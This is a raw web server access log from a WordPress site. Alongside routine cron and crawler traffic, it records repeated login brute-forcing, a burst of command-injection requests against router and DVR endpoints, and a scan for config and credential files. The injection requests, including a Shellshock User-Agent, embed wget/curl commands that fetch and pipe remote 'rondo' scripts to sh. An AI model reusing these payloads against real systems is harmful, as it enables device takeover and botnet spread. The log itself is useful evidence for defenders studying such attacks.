36.133.115.36 - - [28/Sep/2025:02:40:01 +0800] "POST /wp-cron.php?doing_wp_cron=1758998401.1145040988922119140625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
85.208.96.209 - - [28/Sep/2025:02:40:01 +0800] "GET /robots.txt HTTP/1.1" 200 190 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
36.133.115.36 - - [28/Sep/2025:02:41:37 +0800] "POST /wp-cron.php?doing_wp_cron=1758998497.0571460723876953125000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
46.245.76.8 - - [28/Sep/2025:02:41:37 +0800] "POST /wp-login.php HTTP/1.1" 200 2971 "http://cqqizhou.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.126 Safari/537.36 Edg/113.0.1774.50"
36.133.115.36 - - [28/Sep/2025:02:44:46 +0800] "POST /wp-cron.php?doing_wp_cron=1758998685.9675168991088867187500 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
134.122.67.125 - - [28/Sep/2025:02:44:46 +0800] "POST /wp-login.php HTTP/1.1" 200 2971 "http://cqqizhou.com" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.15"
36.133.115.36 - - [28/Sep/2025:02:46:22 +0800] "POST /wp-cron.php?doing_wp_cron=1758998782.6814539432525634765625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
43.156.156.96 - - [28/Sep/2025:02:46:22 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
43.156.156.96 - - [28/Sep/2025:02:46:24 +0800] "GET / HTTP/1.1" 200 33467 "http://www.cqqizhou.com" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [28/Sep/2025:02:47:54 +0800] "POST /wp-cron.php?doing_wp_cron=1758998874.5866909027099609375000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
15.204.218.57 - - [28/Sep/2025:02:47:54 +0800] "POST /wp-login.php HTTP/1.1" 200 2970 "http://cqqizhou.com" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.15"
36.133.115.36 - - [28/Sep/2025:02:54:15 +0800] "POST /wp-cron.php?doing_wp_cron=1758999255.3317189216613769531250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
207.180.232.187 - - [28/Sep/2025:02:54:15 +0800] "POST /wp-login.php HTTP/1.1" 200 2973 "http://cqqizhou.com" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14.5) AppleWebKit/618.3.5 (KHTML, like Gecko) Version/17.4 Safari/618.3.5"
36.133.115.36 - - [28/Sep/2025:02:57:27 +0800] "POST /wp-cron.php?doing_wp_cron=1758999447.1107490062713623046875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
5.161.85.218 - - [28/Sep/2025:02:57:27 +0800] "POST /wp-login.php HTTP/1.1" 200 2974 "http://cqqizhou.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.102 Safari/537.36"
36.133.115.36 - - [28/Sep/2025:02:58:21 +0800] "POST /wp-cron.php?doing_wp_cron=1758999501.3422169685363769531250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
37.60.141.156 - - [28/Sep/2025:02:58:21 +0800] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 301 5 "-" "-"
37.60.141.156 - - [28/Sep/2025:02:58:22 +0800] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 31381 "http://36.133.115.36:80/cgi-bin/luci/;stok=/locale" "-"
36.133.115.36 - - [28/Sep/2025:03:00:39 +0800] "POST /wp-cron.php?doing_wp_cron=1758999639.2645030021667480468750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
34.168.79.94 - - [28/Sep/2025:03:00:39 +0800] "POST /wp-login.php HTTP/1.1" 200 2971 "http://cqqizhou.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0"
36.133.115.36 - - [28/Sep/2025:03:03:54 +0800] "POST /wp-cron.php?doing_wp_cron=1758999834.1649971008300781250000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
51.77.245.241 - - [28/Sep/2025:03:03:54 +0800] "POST /wp-login.php HTTP/1.1" 200 2970 "http://cqqizhou.com" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
36.133.115.36 - - [28/Sep/2025:03:07:05 +0800] "POST /wp-cron.php?doing_wp_cron=1759000025.2790360450744628906250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
34.253.120.95 - - [28/Sep/2025:03:07:05 +0800] "POST /wp-login.php HTTP/1.1" 200 2972 "http://cqqizhou.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36"
36.133.115.36 - - [28/Sep/2025:03:10:16 +0800] "POST /wp-cron.php?doing_wp_cron=1759000216.6144359111785888671875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
79.137.70.209 - - [28/Sep/2025:03:10:16 +0800] "POST /wp-login.php HTTP/1.1" 200 2976 "http://cqqizhou.com" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36"
36.133.115.36 - - [28/Sep/2025:03:13:27 +0800] "POST /wp-cron.php?doing_wp_cron=1759000407.0501461029052734375000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
159.75.154.150 - - [28/Sep/2025:03:13:27 +0800] "POST /wp-login.php HTTP/1.1" 200 2977 "http://cqqizhou.com" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36"
36.133.115.36 - - [28/Sep/2025:03:16:39 +0800] "POST /wp-cron.php?doing_wp_cron=1759000599.7955689430236816406250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
195.117.36.241 - - [28/Sep/2025:03:16:39 +0800] "POST /wp-login.php HTTP/1.1" 200 2973 "http://cqqizhou.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.96 Safari/537.36"
36.133.115.36 - - [28/Sep/2025:03:19:50 +0800] "POST /wp-cron.php?doing_wp_cron=1759000790.0843849182128906250000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
217.160.22.61 - - [28/Sep/2025:03:19:50 +0800] "POST /wp-login.php HTTP/1.1" 200 2972 "http://cqqizhou.com" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36"
36.133.115.36 - - [28/Sep/2025:03:22:41 +0800] "POST /wp-cron.php?doing_wp_cron=1759000961.7266330718994140625000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
85.208.96.201 - - [28/Sep/2025:03:22:41 +0800] "GET /logistics HTTP/1.1" 301 5 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
85.208.96.193 - - [28/Sep/2025:03:22:43 +0800] "GET /logistics/ HTTP/1.1" 200 22410 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
36.133.115.36 - - [28/Sep/2025:03:23:02 +0800] "POST /wp-cron.php?doing_wp_cron=1759000982.2903509140014648437500 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
200.40.79.197 - - [28/Sep/2025:03:23:02 +0800] "POST /wp-login.php HTTP/1.1" 200 2974 "http://cqqizhou.com" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0"
36.133.115.36 - - [28/Sep/2025:03:26:13 +0800] "POST /wp-cron.php?doing_wp_cron=1759001173.8022799491882324218750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
111.229.111.163 - - [28/Sep/2025:03:26:13 +0800] "POST /wp-login.php HTTP/1.1" 200 2975 "http://cqqizhou.com" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36"
36.133.115.36 - - [28/Sep/2025:03:29:03 +0800] "POST /wp-cron.php?doing_wp_cron=1759001343.0785489082336425781250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
144.202.82.88 - - [28/Sep/2025:03:29:03 +0800] "GET http://example.com/ HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
144.202.82.88 - - [28/Sep/2025:03:29:03 +0800] "GET http://cqqizhou.com/ HTTP/1.1" 200 39369 "http://example.com" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
36.133.115.36 - - [28/Sep/2025:03:32:35 +0800] "POST /wp-cron.php?doing_wp_cron=1759001555.5241410732269287109375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
185.46.8.16 - - [28/Sep/2025:03:32:35 +0800] "POST /wp-login.php HTTP/1.1" 200 2973 "http://cqqizhou.com" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:129.0) Gecko/20100101 Firefox/129.0"
36.133.115.36 - - [28/Sep/2025:03:35:44 +0800] "POST /wp-cron.php?doing_wp_cron=1759001744.9475049972534179687500 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
185.153.49.40 - - [28/Sep/2025:03:35:44 +0800] "POST /wp-login.php HTTP/1.1" 200 2976 "http://cqqizhou.com" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.96 Safari/537.36"
36.133.115.36 - - [28/Sep/2025:03:38:19 +0800] "POST /wp-cron.php?doing_wp_cron=1759001899.1743230819702148437500 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.6 - - [28/Sep/2025:03:38:19 +0800] "GET / HTTP/1.1" 200 33466 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
45.88.186.85 - - [28/Sep/2025:03:40:37 +0800] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=%60busybox%20wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.zqq.sh%7Csh%60 HTTP/1.1" 499 0 "-" "Mozilla/5.0 (makenoise@tutanota.de)"
45.88.186.85 - - [28/Sep/2025:03:40:37 +0800] "GET /goform/webRead/open/?path=%7Cwget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.wtf.sh%7Csh HTTP/1.0" 499 0 "-" "Mozilla/5.0 (makenoise@tutanota.de)"
45.88.186.85 - - [28/Sep/2025:03:40:37 +0800] "POST /apply_sec.cgi HTTP/1.1" 499 0 "http://36.133.115.36/login_pic.asp" "Mozilla/5.0 (makenoise@tutanota.de)"
36.133.115.36 - - [28/Sep/2025:03:40:38 +0800] "POST /wp-cron.php?doing_wp_cron=1759002038.0074510574340820312500 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
45.88.186.85 - ffadmin [28/Sep/2025:03:40:38 +0800] "POST /apply.cgi HTTP/1.1" 499 0 "http://36.133.115.36/apply.cgi" "Mozilla/5.0 (makenoise@tutanota.de)"
45.88.186.85 - - [28/Sep/2025:03:40:40 +0800] "POST /GponForm/diag_Form?images/ HTTP/1.1" 499 0 "-" "Mozilla/5.0 (makenoise@tutanota.de)"
45.88.186.85 - root [28/Sep/2025:03:40:41 +0800] "POST /dvr/cmd HTTP/1.1" 499 0 "-" "Mozilla/5.0 (makenoise@tutanota.de)"
45.88.186.85 - admin [28/Sep/2025:03:40:41 +0800] "POST /dvr/cmd HTTP/1.1" 499 0 "-" "Mozilla/5.0 (makenoise@tutanota.de)"
45.88.186.85 - admin [28/Sep/2025:03:40:43 +0800] "POST /goform/SystemCommand HTTP/1.1" 499 0 "-" "Mozilla/5.0 (makenoise@tutanota.de)"
45.88.186.85 - - [28/Sep/2025:03:40:43 +0800] "GET / HTTP/1.1" 499 0 "-" "() { :; }; /bin/bash -c \x22(wget -qO- http://74.194.191.52/rondo.qre.sh||busybox wget -qO- http://74.194.191.52/rondo.qre.sh||curl -s http://74.194.191.52/rondo.qre.sh)|sh\x22& #Mozilla/5.0 (makenoise@tutanota.de)"
45.88.186.85 - - [28/Sep/2025:03:40:43 +0800] "GET /cgi-bin/shortcut_telnet.cgi?wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.wyu.sh%7Csh%26 HTTP/1.1" 499 0 "-" "Mozilla/5.0 (makenoise@tutanota.de)"
45.88.186.85 - - [28/Sep/2025:03:40:44 +0800] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=busybox%20wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.ush.sh%7Csh%26&curpath=%2F&currentsetting.htm=1 HTTP/1.1" 499 0 "-" "Mozilla/5.0 (makenoise@tutanota.de)"
45.88.186.85 - admin [28/Sep/2025:03:40:44 +0800] "POST /editBlackAndWhiteList HTTP/1.1" 499 0 "-" "Mozilla/5.0 (makenoise@tutanota.de)"
45.88.186.85 - admin [28/Sep/2025:03:40:45 +0800] "POST /cgi-bin/cgi_main.cgi HTTP/1.1" 499 0 "http://36.133.115.36/cfg_system_time.htm" "Mozilla/5.0 (makenoise@tutanota.de)"
36.133.115.36 - - [28/Sep/2025:03:40:46 +0800] "POST /wp-cron.php?doing_wp_cron=1759002046.1443099975585937500000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
45.88.186.85 - - [28/Sep/2025:03:40:46 +0800] "POST /cgi-bin/system_mgr.cgi? HTTP/1.1" 499 0 "-" "Mozilla/5.0 (makenoise@tutanota.de)"
45.88.186.85 - - [28/Sep/2025:03:40:46 +0800] "GET /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27%3Bwget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.djc.sh%7Csh%3B%27 HTTP/1.1" 499 0 "-" "Mozilla/5.0 (makenoise@tutanota.de)"
45.88.186.85 - - [28/Sep/2025:03:40:46 +0800] "POST /goform/Mail_Test HTTP/1.0" 499 0 "-" "Mozilla/5.0 (makenoise@tutanota.de)"
45.88.186.85 - - [28/Sep/2025:03:40:47 +0800] "GET /public/template.cgi?templatefile=%24%28wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.xbm.sh%7Csh%29 HTTP/1.1" 499 0 "-" "Mozilla/5.0 (makenoise@tutanota.de)"
45.88.186.85 - - [28/Sep/2025:03:40:47 +0800] "POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=busybox%20wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.ebj.sh%7Csh%26echo%20 HTTP/1.0" 499 0 "-" "Mozilla/5.0 (makenoise@tutanota.de)"
45.88.186.85 - - [28/Sep/2025:03:40:48 +0800] "GET /setup.cgi?todo=funjsq_login&funjsq_access_token=12345|busybox%20wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.fep.sh%7Csh%0A&test=11%00currentsetting.htm HTTP/1.1" 499 0 "-" "Mozilla/5.0 (makenoise@tutanota.de)"
45.88.186.85 - - [28/Sep/2025:03:40:48 +0800] "POST /cgi-bin/cstecgi.cgi HTTP/1.1" 499 0 "http://36.133.115.36/advance/parental.html" "Mozilla/5.0 (makenoise@tutanota.de)"
45.88.186.85 - - [28/Sep/2025:03:40:49 +0800] "GET /cgi-bin/;wget${IFS}-qO-${IFS}http://74.194.191.52/rondo.sbx.sh|sh&echo${IFS} HTTP/1.0" 499 0 "-" "Mozilla/5.0 (makenoise@tutanota.de)"
45.88.186.85 - admin [28/Sep/2025:03:40:50 +0800] "POST /goform/sysTools HTTP/1.1" 499 0 "http://36.133.115.36/adm/systools.asp" "Mozilla/5.0 (makenoise@tutanota.de)"
45.88.186.85 - - [28/Sep/2025:03:40:50 +0800] "GET /shell?busybox%20wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.vcp.sh%7Csh%26 HTTP/1.1" 499 0 "-" "Mozilla/5.0 (makenoise@tutanota.de)"
45.88.186.85 - - [28/Sep/2025:03:40:50 +0800] "GET /HNAP1/ HTTP/1.1" 499 0 "-" "Mozilla/5.0 (makenoise@tutanota.de)"
36.133.115.36 - - [28/Sep/2025:03:41:53 +0800] "POST /wp-cron.php?doing_wp_cron=1759002113.4058101177215576171875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
176.65.149.245 - - [28/Sep/2025:03:41:53 +0800] "GET / HTTP/1.1" 200 33468 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
67.205.42.10 - - [28/Sep/2025:03:42:01 +0800] "POST /wp-login.php HTTP/1.1" 200 2971 "http://cqqizhou.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
36.133.115.36 - - [28/Sep/2025:03:45:11 +0800] "POST /wp-cron.php?doing_wp_cron=1759002311.7579209804534912109375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
134.122.6.46 - - [28/Sep/2025:03:45:11 +0800] "POST /wp-login.php HTTP/1.1" 200 2974 "http://cqqizhou.com" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
36.133.115.36 - - [28/Sep/2025:03:51:30 +0800] "POST /wp-cron.php?doing_wp_cron=1759002690.9412961006164550781250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
217.18.166.83 - - [28/Sep/2025:03:51:30 +0800] "POST /wp-login.php HTTP/1.1" 200 2970 "http://cqqizhou.com" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.15"
36.133.115.36 - - [28/Sep/2025:03:53:49 +0800] "POST /wp-cron.php?doing_wp_cron=1759002829.9555039405822753906250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
94.191.43.82 - - [28/Sep/2025:03:53:50 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
85.208.96.209 - - [28/Sep/2025:03:53:54 +0800] "GET /robots.txt HTTP/1.1" 200 190 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
85.208.96.201 - - [28/Sep/2025:03:53:54 +0800] "GET /industry/ HTTP/1.1" 200 21890 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
94.191.43.82 - - [28/Sep/2025:03:53:57 +0800] "GET / HTTP/1.1" 200 33467 "http://www.cqqizhou.com" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [28/Sep/2025:03:56:07 +0800] "POST /wp-cron.php?doing_wp_cron=1759002967.8916909694671630859375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
37.60.141.156 - - [28/Sep/2025:03:56:09 +0800] "GET / HTTP/1.1" 200 151919 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246"
36.133.115.36 - - [28/Sep/2025:03:57:25 +0800] "POST /wp-cron.php?doing_wp_cron=1759003045.3223700523376464843750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
27.28.44.215 - - [28/Sep/2025:03:57:25 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 7.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.2268.88 Safari/537.36"
27.28.44.215 - - [28/Sep/2025:03:57:25 +0800] "GET / HTTP/1.1" 200 39369 "-" "Mozilla/5.0 (Windows NT 7.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.2268.88 Safari/537.36"
27.28.44.215 - - [28/Sep/2025:03:57:25 +0800] "GET /contacts/ HTTP/1.1" 200 21496 "-" "Mozilla/5.0 (Windows NT 9.4; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3216.88 Safari/537.36"
36.133.115.36 - - [28/Sep/2025:03:57:48 +0800] "POST /wp-cron.php?doing_wp_cron=1759003068.0842521190643310546875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
34.79.173.252 - - [28/Sep/2025:03:57:48 +0800] "POST /wp-login.php HTTP/1.1" 200 2972 "http://cqqizhou.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0"
195.211.188.185 - - [28/Sep/2025:03:58:09 +0800] "GET / HTTP/1.1" 200 39369 "-" "Go-http-client/1.1"
195.211.188.185 - - [28/Sep/2025:03:58:10 +0800] "GET /phpversion.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
195.211.188.185 - - [28/Sep/2025:03:58:10 +0800] "GET /asdf.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
195.211.188.185 - - [28/Sep/2025:03:58:11 +0800] "GET /config/aws.yml HTTP/1.1" 404 8989 "-" "Go-http-client/1.1"
195.211.188.185 - - [28/Sep/2025:03:58:11 +0800] "GET /aws.yml HTTP/1.1" 404 8989 "-" "Go-http-client/1.1"
195.211.188.185 - - [28/Sep/2025:03:58:11 +0800] "GET /wp-config.php.bak HTTP/1.1" 404 8989 "-" "Go-http-client/1.1"
195.211.188.185 - - [28/Sep/2025:03:58:12 +0800] "GET /config/env.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
195.211.188.185 - - [28/Sep/2025:03:58:12 +0800] "GET /old_phpinfo.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
195.211.188.185 - - [28/Sep/2025:03:58:12 +0800] "GET /app/etc/env.local.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
195.211.188.185 - - [28/Sep/2025:03:58:12 +0800] "GET /phpinfo.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
195.211.188.185 - - [28/Sep/2025:03:58:12 +0800] "GET /_profiler/phpinfo.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
195.211.188.185 - - [28/Sep/2025:03:58:12 +0800] "GET /php-info.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
195.211.188.185 - - [28/Sep/2025:03:58:12 +0800] "GET /linusadmin-phpinfo.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
195.211.188.185 - - [28/Sep/2025:03:58:12 +0800] "GET /?pp=env&pp=env HTTP/1.1" 200 39369 "-" "Go-http-client/1.1"
195.211.188.185 - - [28/Sep/2025:03:58:12 +0800] "GET /infos.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
195.211.188.185 - - [28/Sep/2025:03:58:12 +0800] "GET /?pp=enable&pp=env HTTP/1.1" 200 39369 "-" "Go-http-client/1.1"
195.211.188.185 - - [28/Sep/2025:03:58:12 +0800] "GET /dashboard/phpinfo.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
195.211.188.185 - - [28/Sep/2025:03:58:12 +0800] "GET /config.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
195.211.188.185 - - [28/Sep/2025:03:58:12 +0800] "GET /php.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
195.211.188.185 - - [28/Sep/2025:03:58:12 +0800] "GET /application/config/database.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
195.211.188.185 - - [28/Sep/2025:03:58:12 +0800] "GET /dev/phpinfo.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
195.211.188.185 - - [28/Sep/2025:03:58:12 +0800] "GET /application/config/profiler.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
195.211.188.185 - - [28/Sep/2025:03:58:12 +0800] "GET /test1.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
195.211.188.185 - - [28/Sep/2025:03:58:12 +0800] "GET /config/broadcasting.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
195.211.188.185 - - [28/Sep/2025:03:58:12 +0800] "GET /config/session.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
195.211.188.185 - - [28/Sep/2025:03:58:12 +0800] "GET /application/config/migration.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
195.211.188.185 - - [28/Sep/2025:03:58:12 +0800] "GET /install/index.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
195.211.188.185 - - [28/Sep/2025:03:58:12 +0800] "GET /config/autoload/global.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
195.211.188.185 - - [28/Sep/2025:03:58:12 +0800] "GET /config/queue.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
195.211.188.185 - - [28/Sep/2025:03:58:12 +0800] "GET /config/bootstrap.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
195.211.188.185 - - [28/Sep/2025:03:58:12 +0800] "GET /application/config/email.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
195.211.188.185 - - [28/Sep/2025:03:58:12 +0800] "GET /application/config/foreign_chars.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
195.211.188.185 - - [28/Sep/2025:03:58:12 +0800] "GET /application/config/hooks.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
195.211.188.185 - - [28/Sep/2025:03:58:12 +0800] "GET /application/config/routes.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
195.211.188.185 - - [28/Sep/2025:03:58:12 +0800] "GET /config/auth.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
195.211.188.185 - - [28/Sep/2025:03:58:12 +0800] "GET /config/database.config.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
195.211.188.185 - - [28/Sep/2025:03:58:12 +0800] "GET /config/cli_bootstrap.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
195.211.188.185 - - [28/Sep/2025:03:58:12 +0800] "GET /config/production.config.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
195.211.188.185 - - [28/Sep/2025:03:58:12 +0800] "GET /config/autoload/local.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
195.211.188.185 - - [28/Sep/2025:03:58:12 +0800] "GET /application/config/config.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
195.211.188.185 - - [28/Sep/2025:03:58:12 +0800] "GET /application/config/encryption.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
195.211.188.185 - - [28/Sep/2025:03:58:12 +0800] "GET /application/config/autoload.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
195.211.188.185 - - [28/Sep/2025:03:58:12 +0800] "GET /config/routes.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
195.211.188.185 - - [28/Sep/2025:03:58:12 +0800] "GET /config/application.config.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
195.211.188.185 - - [28/Sep/2025:03:58:12 +0800] "GET /config/acl.config.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
195.211.188.185 - - [28/Sep/2025:03:58:12 +0800] "GET /app/etc/config.local.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
195.211.188.185 - - [28/Sep/2025:03:58:12 +0800] "GET /config/paths.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
195.211.188.185 - - [28/Sep/2025:03:58:12 +0800] "GET /secured/phpinfo.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
195.211.188.185 - - [28/Sep/2025:03:58:12 +0800] "GET /test2.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
